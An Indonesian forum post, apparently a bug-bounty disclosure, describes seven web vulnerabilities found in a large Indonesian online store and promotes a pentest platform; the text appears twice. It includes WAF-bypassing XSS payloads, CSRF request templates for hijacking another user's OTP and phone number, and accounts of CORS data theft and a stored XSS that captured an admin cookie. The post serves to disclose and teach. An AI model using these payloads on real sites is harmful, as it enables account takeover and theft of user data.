- Daftar
- 4 Oct 1988
- Post
- ×
- Like diterima
- 9.055
[hide]
Bukan hal yang aneh jika terdapat bug pada sebuah sistem atau aplikasi. Namun, jika suatu sistem bersinggungan dengan data-data penting pengguna, bug bisa berpotensi menjadi celah keamanan. Karena itu, sebelum dirilis ke publik, aplikasi akan melewati tahap penetration testing atau pentest. Tujuannya untuk mencari dan “menambal” celah keamanan yang ada.
Biasanya, perusahaan akan menghubungi pentester, yaitu orang-orang yang memiliki keahlian dalam melakukan pentest. Lalu, jika kamu memiliki sebuah sistem atau aplikasi, dan ingin menguji keamanannya, di mana kamu bisa mencari para peretas topi putih ini? Salah satu tempat yang bisa kamu tuju adalah https://www.ethic.ninja/, platform yang menghubungkan perusahaan atau developer dengan para pentester.
“Dengan adanya program ini, developer bisa mengetahui kelemahan sistem mereka sebelum masyarakat umum, sehingga mereka bisa meminimalkan kebocoran data-data penting dalam sistem mereka—juga kerugian-kerugian lainnya,”
contoh kasus Toko Online Terbesar Di Indonesia
Daftar temuan vulnerability bug;
1. Bypassing WAF rules – XSS (1)
2. Hijacking OTP & Phone Number other users – CSRF
3. Tabnabbing
4. Get sensitive data other users – CORS Misconfiguration
5. Bypassing WAF rules – XSS (2)
6. Bypassing Same Origin Policy
7. View Authenticated Admin Panel Tokopedia! – Stored XSS
[1] Bypassing WAF rules – XSS
Pada saat melakukan fuzzing, kami menemukan adanya reflected string di https://www.toko****a.com/iklan ?source=footer
quote tidak dilakukan escape, maka langkah selanjutnya kami coba menyisipkan event onmouseover pada DOM
Onmouseover terfilter oleh WAF?, kami melakukan riset lebih lanjut dan berkesimpulan bahwa urutan rule filternya seperti ini :
Dan hasilnya… XSS ter-trigger
XSS dapat mencuri token csrf untuk melakukan banyak hal seperti :
Payload pertama adalah payload untuk memaksa victim user melakukan pengiriman kode OTP ke HP attacker yang berguna untuk mendaftarkan nomor HP attacker ke akun victim :
Kemudian payload kedua adalah memaksa victim user untuk memasukkan OTP yang sudah diperoleh sebelumnya dari payload pertama agar proses verifikasi nomor HP attacker valid :
[3] Tabnabbing
Tabnabbing adalah salah satu kategori next level phishing, serangan ini bertujuan mengelabui user untuk mendapatkan sensitif data berupa username dan password, cara kerjanya sendiri adalah seperti berikut :
1. Attacker membuat link di halaman
2.Victim klik link tersebut, sehingga akan membuka tab baru
3.Ketika victim kembali ke tab sebelumnya maka tab sebelumnya telah berubah/berpindah
Solusi dapat menggunakan banyak cara diantaranya :
1. Jika memungkinkan hindari penggunaan target=_blank
2. Tambahkan atribut rel=”noreferrer”
3. Jika menggunakan js dapat menambahkan null pada properti window.opener <script>var win=window.open(url, “target=_blank”);win.opener=null;</script>
Bug ini tergolong mudah dilakukan (halaman target tidak harus mengikuti same-origin policy, sehingga domain yang berbeda pun dapat dilakukan reload secara background) sehingga kemungkinan berhasil mengelabui user cukup tinggi, apalagi jika diakses melalui mobile browser yang seringkali tidak ditampilkan URL nya.
[4] Get sensitive data other users – CORS Misconfiguration
Beberapa data yang dapat diambil oleh attacker antara lain :
1. Token
2. Pesan/inbox
3. Pulsa
4. Saldo
PoC :
Get Token :
Get Saldo :
[5] Bypassing WAF rules – XSS (2)
ditemukan bahwa pada halaman katalog terdapat XSS.
Nilai dari parameter page ditulis ulang (reflective) dibeberapa tempat seperti :
[6] Bypassing Same Origin Policy
Pada saat melakukan testing graphql terlihat ada beberapa data sensitive yang dikeluarkan seperti, id, email, phone, saldo dll. Maka untuk “mencuri” data tersebut kami coba dengan eksploitasi CORS Misconfiguration, pada percobaan pertama dengan mengganti origin menjadi https://ethic.ninja namun seperti gambar di bawah hal ini sudah ditangani dengan baik.
[7] View Authenticated Admin Panel Tokopedia! – Stored XSS
Namun hal ini belum cukup meyakinkan tim security toko****a, karena nama toko dibatasi 24 karakter dan sepertinya tidak mungkin menjadi eksploit yang dapat mencuri token/cookie, sesuai pernyataan dari tim security toko****a melalui email di bawah ini.
pembuktian;
Plus bonus cookie admin yang didalamnya terdapat email admin, username, nama admin, dan no telepon admin.
saya mengajak teman teman buat jadi
Bug Bounty Program
agar bisa mendapatkan penghasilan/reward karena membantu perusahaan menjaga aplikasinya.
dan mencarikan celah untuk di perbaiki.
Yang suka jadi Hacker ,ini sebenernya juga sama ilmunya Hanya saja Tujuannya berbeda.
bisa belajar disini ;
https://www.ethic.ninja/
DATA INI SUDAH DI OP OLEH PERUSAHAAN YANG BERSANGKUTAN.
Bukan hal yang aneh jika terdapat bug pada sebuah sistem atau aplikasi. Namun, jika suatu sistem bersinggungan dengan data-data penting pengguna, bug bisa berpotensi menjadi celah keamanan. Karena itu, sebelum dirilis ke publik, aplikasi akan melewati tahap penetration testing atau pentest. Tujuannya untuk mencari dan “menambal” celah keamanan yang ada.
Biasanya, perusahaan akan menghubungi pentester, yaitu orang-orang yang memiliki keahlian dalam melakukan pentest. Lalu, jika kamu memiliki sebuah sistem atau aplikasi, dan ingin menguji keamanannya, di mana kamu bisa mencari para peretas topi putih ini? Salah satu tempat yang bisa kamu tuju adalah https://www.ethic.ninja/, platform yang menghubungkan perusahaan atau developer dengan para pentester.
“Dengan adanya program ini, developer bisa mengetahui kelemahan sistem mereka sebelum masyarakat umum, sehingga mereka bisa meminimalkan kebocoran data-data penting dalam sistem mereka—juga kerugian-kerugian lainnya,”
contoh kasus Toko Online Terbesar Di Indonesia
Daftar temuan vulnerability bug;
1. Bypassing WAF rules – XSS (1)
2. Hijacking OTP & Phone Number other users – CSRF
3. Tabnabbing
4. Get sensitive data other users – CORS Misconfiguration
5. Bypassing WAF rules – XSS (2)
6. Bypassing Same Origin Policy
7. View Authenticated Admin Panel Tokopedia! – Stored XSS
[1] Bypassing WAF rules – XSS
Pada saat melakukan fuzzing, kami menemukan adanya reflected string di https://www.toko****a.com/iklan ?source=footer
Code:
input: source=footer123
output: <a class="site-logo" href="https://www.toko****a.com/iklan?source=footer123&medium=desktop">Toko****a</a>
Code:
input: source=footer" hello="
output: <a class="site-logo" href="https://www.toko****a.com/iklan?source=footer" hello="&medium=desktop">Toko****a</a>
Code:
input: source=footer" style="background:red" onmouseover="alert(document.domain)"><x="
output: <a class="site-logo" href="https://www.toko****a.com/iklan?source=footer" style=”background:red;" x ="&medium=desktop">Toko****a</a>
- Hapus semua event html (onmouseover, onkeyup, onerror) dll –> namun ternyata semua bentuk pattern dengan prefix on dihilangkan juga seperti ”oncom, onabcd, ondelondel”
- Karakter lebih besar (>) dan lebih kecil (<) diganti dengan spasi “ “
Code:
source=footer" style="background:red; "<onmouseover="alert(document.domain)"<x="
<a class="site-logo" href="https://www.toko****a.com/iklan?source=footer" style="background:red; " onmouseover ="alert(document.domain)" x ="&medium=desktop">Tokopedia</a>
</a>
XSS dapat mencuri token csrf untuk melakukan banyak hal seperti :
- Mendapatkan informasi user lain seperti (nama, email, no hp, no rekening, dll)
- Mematikan OTP user lain
- Memasukkan barang ke keranjang tanpa sepengetahuan user
- Melihat inbox user lain
- dll
Payload pertama adalah payload untuk memaksa victim user melakukan pengiriman kode OTP ke HP attacker yang berguna untuk mendaftarkan nomor HP attacker ke akun victim :
Code:
[GET] /ajax/msisdn.pl?action=event_sent_verification_code&phone=[attacker phone]&update_flag=&email_code=&v=[timestamp]
Code:
[POST]
/msisdn-verification.pl?action=verifikasi&type=home
phone=[attacker phone]&code=[PIN OTP yang diperoleh]&submit=[3] Tabnabbing
Tabnabbing adalah salah satu kategori next level phishing, serangan ini bertujuan mengelabui user untuk mendapatkan sensitif data berupa username dan password, cara kerjanya sendiri adalah seperti berikut :
1. Attacker membuat link di halaman
2.Victim klik link tersebut, sehingga akan membuka tab baru
3.Ketika victim kembali ke tab sebelumnya maka tab sebelumnya telah berubah/berpindah
Solusi dapat menggunakan banyak cara diantaranya :
1. Jika memungkinkan hindari penggunaan target=_blank
2. Tambahkan atribut rel=”noreferrer”
3. Jika menggunakan js dapat menambahkan null pada properti window.opener <script>var win=window.open(url, “target=_blank”);win.opener=null;</script>
Bug ini tergolong mudah dilakukan (halaman target tidak harus mengikuti same-origin policy, sehingga domain yang berbeda pun dapat dilakukan reload secara background) sehingga kemungkinan berhasil mengelabui user cukup tinggi, apalagi jika diakses melalui mobile browser yang seringkali tidak ditampilkan URL nya.
[4] Get sensitive data other users – CORS Misconfiguration
Beberapa data yang dapat diambil oleh attacker antara lain :
1. Token
2. Pesan/inbox
3. Pulsa
4. Saldo
PoC :
Get Token :
Get Saldo :
[5] Bypassing WAF rules – XSS (2)
ditemukan bahwa pada halaman katalog terdapat XSS.
Code:
[POST]
url : https://m.toko****a.com/catalog/50985/oppo-a39?page=4&tab=gallery
parameter : page
- <meta name=”title” content=”Galeri Oppo A39 | Toko****a, Halaman , Halaman 4″ />
- <meta property=”og:title” content=”Galeri Oppo A39 | Toko****a, Halaman , Halaman 4″/>
- <title>Galeri Oppo A39 | Toko****a, Halaman , Halaman 4</title>
Code:
[POST]
https://m.toko****a.com/catalog/50985/oppo-a39?page=4"><a<img src="https://ethic.ninja" onerror>=prompt(document.domain)>&tab=gallery[6] Bypassing Same Origin Policy
Pada saat melakukan testing graphql terlihat ada beberapa data sensitive yang dikeluarkan seperti, id, email, phone, saldo dll. Maka untuk “mencuri” data tersebut kami coba dengan eksploitasi CORS Misconfiguration, pada percobaan pertama dengan mengganti origin menjadi https://ethic.ninja namun seperti gambar di bawah hal ini sudah ditangani dengan baik.
[7] View Authenticated Admin Panel Tokopedia! – Stored XSS
Namun hal ini belum cukup meyakinkan tim security toko****a, karena nama toko dibatasi 24 karakter dan sepertinya tidak mungkin menjadi eksploit yang dapat mencuri token/cookie, sesuai pernyataan dari tim security toko****a melalui email di bawah ini.
pembuktian;
Plus bonus cookie admin yang didalamnya terdapat email admin, username, nama admin, dan no telepon admin.
saya mengajak teman teman buat jadi
Bug Bounty Program
agar bisa mendapatkan penghasilan/reward karena membantu perusahaan menjaga aplikasinya.
dan mencarikan celah untuk di perbaiki.
Yang suka jadi Hacker ,ini sebenernya juga sama ilmunya Hanya saja Tujuannya berbeda.
bisa belajar disini ;
https://www.ethic.ninja/
DATA INI SUDAH DI OP OLEH PERUSAHAAN YANG BERSANGKUTAN.
SGALA BUG YANG ADA DI THREAD INI SUDAH CLOSE.
[/hide]
HARGAILAH HASIL KARYA ORANG LAIN
Terakhir diubah:
